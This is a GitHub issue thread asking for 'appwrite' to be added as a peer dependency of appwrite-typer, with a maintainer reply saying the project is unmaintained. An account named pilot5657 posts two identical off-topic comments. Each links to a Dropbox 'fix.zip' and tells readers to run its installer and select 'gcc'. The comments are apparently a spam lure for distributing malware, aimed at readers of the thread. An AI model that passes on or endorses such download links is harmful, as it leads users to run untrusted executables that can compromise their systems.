### ISSUE TITLE
Add "appwrite" as a peer dependency

### ISSUE THREAD

**Issue by Dan503** [orenaksakal/appwrite-typer#4]
The output of `appwrite-typer` adds `import type { Models } from "appwrite";` to the top of the file to get the core `Model` types.

I was using appwrite through the [react-native-appwrite](https://www.npmjs.com/package/react-native-appwrite) package, so `Models` was undefined for me.

I suggest adding `"appwrite"` as a _peer_ dependency instead of a normal dependency since compilers will complain if it comes across an import statement for a module that cannot be found in the project package.json dependencies. So devs have to download the `appwrite` package themselves, it can't be automated for them.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by orenaksakal** [comment]
Hey I'm no longer using appwriter but forks and PRs are welcome
